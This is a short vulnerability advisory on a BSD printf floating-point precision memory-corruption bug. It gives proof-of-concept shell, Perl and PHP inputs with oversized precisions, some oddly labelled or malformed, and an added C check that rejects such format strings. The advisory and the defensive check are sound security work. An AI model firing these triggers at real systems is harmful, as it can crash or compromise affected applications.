source: https://www.securityfocus.com/bid/35510/info

Multiple BSD distributions are prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.

Attackers may exploit this issue to execute arbitrary code within the context of affected applications.

The following are vulnerable:

OpenBSD 4.5
NetBSD 5.0
FreeBSD 6.4 and 7.2

Other software based on the BSD code base may also be affected.

The following proof-of-concept shell commands are available:

printf %1.262159f 1.1
printf %11.2109999999f
printf %11.2009999999f
printf %11.2009999999f

The following proof-of-concept Perl script is available:

#!/usr/local/bin/perl
printf "%0.4194310f", 0x0.0x41414141;

The following proof-of-concept J program is available:

cxib=0.<?php echo str_repeat("1",296450); ?>
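The shell and Perl proof-of-concept formats above all put a very large precision on a floating-point conversion. The following C check is an added example, not part of the original advisory or of any BSD code: an application can run it on an untrusted format string before passing it to the printf family, and reject any floating-point precision above a limit. The function names and the limit of 512 are assumptions chosen for illustration.

```c
#include <ctype.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* Assumed policy limit, not a value from the advisory. */
#define MAX_FLOAT_PRECISION 512L

/* Largest precision on any a/e/f/g conversion in fmt, or -1 if none gives
 * one. A run-time '*' precision is unknown here, so it counts as LONG_MAX. */
long max_float_precision(const char *fmt)
{
    long worst = -1;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%' || *++p == '%') continue;              /* text or %% */
        while (*p && strchr("-+ #0'", *p)) p++;              /* flags */
        while (isdigit((unsigned char)*p) || *p == '*') p++; /* width */
        long prec = -1;
        if (*p == '.') {
            prec = 0;
            if (*++p == '*') { prec = LONG_MAX; p++; }
            while (isdigit((unsigned char)*p)) {             /* saturating parse */
                int d = *p++ - '0';
                prec = prec > (LONG_MAX - d) / 10 ? LONG_MAX : prec * 10 + d;
            }
        }
        while (*p && strchr("hlLqjzt", *p)) p++;             /* length modifiers */
        if (*p == '\0') break;                               /* truncated spec */
        if (strchr("aAeEfFgG", *p) && prec > worst) worst = prec;
    }
    return worst;
}

/* Nonzero when every floating-point precision is within the limit. */
int format_is_acceptable(const char *fmt)
{
    return max_float_precision(fmt) <= MAX_FLOAT_PRECISION;
}

int main(void)
{
    /* Constructed inputs: three formats from the advisory, one benign. */
    const char *samples[] = { "%1.262159f", "%11.2109999999f",
                              "%0.4194310f", "total: %8.2f%%\n" };
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++)
        printf("%-6s precision=%ld\n", format_is_acceptable(samples[i])
               ? "ok" : "REJECT", max_float_precision(samples[i]));
    return 0;
}
```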